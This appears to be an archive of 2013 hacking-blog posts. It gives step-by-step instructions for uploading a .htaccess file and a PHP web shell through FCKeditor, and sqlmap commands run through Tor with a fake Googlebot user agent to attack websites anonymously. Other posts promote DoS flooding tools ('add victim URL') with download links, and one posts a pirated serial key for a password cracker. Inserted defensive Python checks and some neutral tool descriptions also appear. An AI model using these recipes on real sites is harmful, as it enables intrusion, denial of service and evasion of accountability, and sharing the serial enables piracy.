
Bypass all versions FCKeditor with htaccess

Friday, December 27, 2013 Sensei Fedon 0 Comments

1. Create an htaccess file (.htaccess):
   SetHandler application/x-httpd-php
2. Upload this .htaccess with FCKeditor:
   http://target.com/FCKeditor/editor/filemanager/upload/test.html
   http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3. Upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://target.com/anything/shell_php.gif
6. The shell is now available from the server.
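
The steps above work because SetHandler in an uploaded .htaccess makes Apache run every file in that directory, and in the directories below it, as PHP, so the extension rename in step 4 no longer protects anything. The following audit of an upload tree for that condition is an added example, not part of the original post; the directory names, file names and reason labels are constructed for illustration.

```python
import os
import re
import tempfile

# Directives that make Apache run files as scripts regardless of extension.
HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType)\b.*\b(php|cgi)",
                        re.IGNORECASE | re.MULTILINE)
# Script extension hidden before the last one; "_" covers FCKeditor's renaming.
HIDDEN_EXT_RE = re.compile(r"[._](php\d?|phtml|phar)\.[^.]+$", re.IGNORECASE)

def audit_upload_dir(root):
    """Return sorted (relative_path, reason) findings for an upload tree."""
    findings, overridden = [], []
    for dirpath, _dirs, files in os.walk(root):  # top-down: parents come first
        # An .htaccess applies to its own directory and everything below it.
        inherited = any(dirpath.startswith(d + os.sep) for d in overridden)
        ht = os.path.join(dirpath, ".htaccess")
        if os.path.isfile(ht):
            with open(ht, errors="replace") as fh:
                if HANDLER_RE.search(fh.read()):
                    findings.append((os.path.relpath(ht, root), "handler-override"))
                    overridden.append(dirpath)
                    inherited = True
        for name in (f for f in files if f != ".htaccess"):
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            if inherited:
                findings.append((rel, "served-as-script"))
            elif HIDDEN_EXT_RE.search(name):
                findings.append((rel, "hidden-script-extension"))
    return sorted(findings)

def build_sample_tree(root):  # constructed files mirroring the post's uploads
    samples = {
        "userfiles/.htaccess": "SetHandler application/x-httpd-php\n",
        "userfiles/shell_php.gif": "GIF89a",
        "userfiles/image/photo.jpg": "JFIF",
        "clean/.htaccess": "# SetHandler application/x-httpd-php\nOptions -Indexes\n",
        "clean/report_php.gif": "GIF89a",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(*audit_upload_dir(tmp), sep="\n")
```

The name pattern is a heuristic and will also flag harmless files such as a screenshot called report_php.gif; the handler-override finding is the one that needs immediate attention, and setting AllowOverride None on upload directories in the main server configuration stops uploaded .htaccess files from being honoured at all.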


Use sqlmap with tor proxy

Tuesday, December 17, 2013 Sensei Fedon 0 Comments

When trying to exploit some website using sqlmap, it's a good idea to be anonymous. Sqlmap has excellent support for using common proxies or tor.
First start tor and ensure that it is running the socks5 daemon on port 9050. Then use the socks5 proxy with sqlmap as follows:
# ./sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10"
The above command uses tor with type SOCKS5. The --tor option by default tries to use the HTTP proxy instead of SOCKS5. Therefore it's necessary to set the tor-type to SOCKS5.
To further improve the anonymity of the scan, use some fake user agent. Here is a quick example.
# ./sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10" --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
The above example uses a Googlebot-style user agent in the HTTP headers of the scan, further complicating the identity of the hacker.
That is pretty much it. Enjoy hacking!!
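
On the receiving side, a Googlebot user agent is only a claim: Google documents that genuine crawler addresses reverse-resolve to googlebot.com or google.com and that the returned name resolves forward to the same address. The check below over access-log lines is an added example, not part of the original post; the log lines, IP addresses, host names and the offline resolver table are constructed.

```python
import re
import socket

# Constructed access-log lines (combined format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Dec/2013:10:01:22 +0000] "GET /view_section.php?id=10 HTTP/1.1" 200 512 "-" "Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.20 - - [17/Dec/2013:10:02:10 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.55 - - [17/Dec/2013:10:03:00 +0000] "GET / HTTP/1.1" 200 300 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"$')
GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")

def dns_lookups(ip):
    """Live reverse lookup plus forward lookup of the returned name."""
    try:
        host = socket.gethostbyaddr(ip)[0]
        return host, socket.gethostbyname_ex(host)[2]
    except OSError:
        return None, []

def is_real_googlebot(ip, lookups=dns_lookups):
    """Reverse DNS must end in a Google domain and resolve forward to the same IP."""
    host, addrs = lookups(ip)
    return bool(host) and host.lower().endswith(GOOGLE_SUFFIXES) and ip in addrs

def spoofed_googlebot_hits(log_text, lookups=dns_lookups):
    """Return (ip, path) for requests whose Googlebot user agent fails verification."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and "googlebot" in m.group(3).lower():
            ip, path = m.group(1), m.group(2)
            if not is_real_googlebot(ip, lookups):
                hits.append((ip, path))
    return hits

# Constructed resolver table so the example runs offline.
FAKE_DNS = {"198.51.100.20": ("crawl-198-51-100-20.googlebot.com", ["198.51.100.20"]),
            "203.0.113.7": ("exit.relay.example", ["203.0.113.7"])}

def offline_lookups(ip):
    return FAKE_DNS.get(ip, (None, []))

if __name__ == "__main__":
    print(spoofed_googlebot_hits(SAMPLE_LOG, offline_lookups))
```

Requests that fail this check while probing parameterised URLs are a strong signal for alerting or blocking, whatever network they arrive from.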


[ExploitSearch.net] Exploit / Vulnerability Search Engine

Wednesday, November 13, 2013 Sensei Fedon 0 Comments

Exploitsearch.net is an attempt at cross-referencing/correlating exploits and vulnerability data from various sources and making the resulting database available to everyone.

Unlike other exploit search engines which are simply custom google searches, this site actually crawls the source databases/websites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching. 


ExploitSearch.net


[WAF-FLE] Web application firewall: fast log and event console

Wednesday, November 13, 2013 Sensei Fedon 0 Comments


WAF-FLE is an open source console for ModSecurity; it allows the ModSecurity admin to view and search events sent by mlogc (the ModSecurity event log handler).

Features:
  • Central event console
  • Supports ModSecurity in “traditional” and “Anomaly Scoring”
  • Able to receive events sent from mlogc (in real time or in batch using mlogc-batch-load.pl)
  • No sensor number limit
  • Dashboard with recent events information
  • Drill down of events with filter
  • Almost every piece of data is “clickable” to drill down the filter
  • Inverted filter (to filter for “all but this item”)
  • Filter for network (in CIDR format, x.x.x.x/22)
  • Raw event download
  • Uses MySQL as database
  • Open source, released under GPL v2


Advanced Onion Router

Friday, October 25, 2013 Sensei Fedon 0 Comments

Advanced Onion Router is a portable client for the OR network and is intended to be an improved alternative for Tor+Vidalia+Privoxy bundle for Windows users. Some of the improvements include UNICODE paths, support for HTTP and HTTPS proxy protocols on the same Socks4/Socks5 port with HTTP header filtering that generates fake identity-dependent headers every time the identity is changed (proxy chains are also supported), support for NTLM proxies, a User Interface that makes Tor's options and actions more accessible, local banlist for forbidden addresses, private identity isolation, a point-and-click process interceptor that can redirect connections from programs that don't support proxies, also giving them fake information about the local system and support for .onion addresses. Also, it can estimate AS paths for all circuits and prevent AS path intersections, it can restrict circuits to be built using only nodes from different countries, can change circuit lengths and more.


DecFlooder-v1.00 Effective Flood Tool

Tuesday, September 24, 2013 srius 0 Comments

It is time to make some attacks which are like DDoS but from only one PC :D

DecFlooder-v1.00 Hack Tools 


easy to use as you see from the picture


  1. just select your connection speed 
  2. add victim URL
  3. then push the Enjoy Button :D ( FLOOD !!!)


Download Link:

https://app.box.com/s/gzk0gbsuneixsoixss19


Anyone Need Free Proxy List ???

Tuesday, September 24, 2013 srius 0 Comments

 Elite Proxy Switcher


The Best Tool That I Ever Found on The Internet For Finding And Checking Huge Proxy Lists

You Can Find Elite and Anonymous Proxy Lists Easily

Download Link:

https://app.box.com/s/npn4i28sayn0fiqztvm8



It's Time to Make Huge DoS Attacks Easily **NoobFriendly

Tuesday, September 24, 2013 srius 0 Comments

Hi guys, today I am going to tell you about a perfect program which makes Effective DoS Attacks Easily  :D

Name of the Program is DoS-Pro v 2.0 RC2

It's from my personal archive :D 


Download Link :




Hash Console v1.5 All-in-one Command-line tool to generate hash md5, sha1, sha256, sha384, sha512, lm, ntlm, base64, crc32, rot13

Friday, September 20, 2013 Sensei Fedon 0 Comments

Hash Console is the all-in-one command-line based tool to quickly generate more than 15 different types of hashes. It can generate a hash for any given file or simple text.

Hashes or checksums are used for multiple purposes including file integrity verification, encryption, password storage etc. Hash Console helps you easily and quickly compute the hash for a given file or text.

Currently it supports the following popular hash types:
  • MD5 family (md2, md4, md5)
  • SHA family (sha1, sha256, sha384, sha512)
  • BASE64
  • ROT13
  • CRC32
  • ADLER32
  • HAVAL256
  • LM
  • NTLM
  • RIPEMD160
  • WHIRLPOOL
Being a command-line tool makes it ideal for automation and easy to use on remote systems.


[IronWASP v0.9.6.5] Open Source Advanced Web Security Testing Platform

Friday, September 20, 2013 Sensei Fedon 0 Comments

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.

What’s new in IronWASP v0.9.6.5


IronWASP v0.9.6.5 is now available for download. Users of older versions should get an update prompt when using IronWASP. This is what you get with the new version.

  • Completely redesigned awesome new Results section
  • Support for editing, scanning and fuzzing SOAP messages
  • New active checks for Server Side Includes, Server Side Request Forgery and Expression Language Injection
  • New passive check for JSON messages that are vulnerable to JSON hijacking
  • Significantly faster and robust parsers for XML, JSON and Multi-part messages with auto-detection support
  • Enhancements to the Payload Effect Analysis feature
  • Enhancements to the Scan Trace Viewer feature
  • Ability to create Request in Manual Testing section from clipboards
  • New Network address parsing APIs
  • Update to FiddlerCore v2.4.4.8


How to Crack Rar Passwords

Friday, September 20, 2013 srius 0 Comments

Today, I’m gonna share with you an easy way to break your Winrar Password. You can use this method in case you forget your Winrar Password or download a Winrar File for which you do not know the password. Good Luck With Passwords :)

Serial : ARCHPR-TBHW5SSMYGQS-3KQ2E6E9CU4S4BMN


How to Hide Your IP Address

Friday, September 20, 2013 srius 0 Comments



To hide their IP, some of us use anonymizers (anonymity servers); some use proxy servers.

But VPNs (Virtual Private Networks) are the most trusted way of hiding online, even more secure than proxy servers and anonymity servers. Today I will tell you the best VPN in the world :)

http://privitize.com/get/privitize


PrivitizeVPN servers are run by ThePirateBay. No connection or traffic logs are kept

You can do what you want while using PrivitizeVPN , all anonymously

Good Surfing on the internet anonymously :)


Monitor your Website’s Uptime with Google Docs

Thursday, September 05, 2013 Sensei Fedon 0 Comments

Do you have a website or a blog? Would you like to receive instant alerts as soon as your site goes down or becomes inaccessible to users? Would you like these alerts to arrive in your email inbox or as text messages on your mobile phone or both?
Most website owners use “freemium” website monitoring services to track the downtime and uptime of their sites. These services offer free plans but you often have to upgrade for unlimited email/SMS alerts or if you would like to monitor a large number of websites.
Website Monitor with SMS Alerts
Build your own website monitoring tool with Google Docs, SMS alerts included


Cracking WPA & WPA2 key with Reaver on Kali Linux (Without Dictionary attack)

Tuesday, August 20, 2013 Sensei Fedon 0 Comments

This is how WPA2 passwords are cracked...

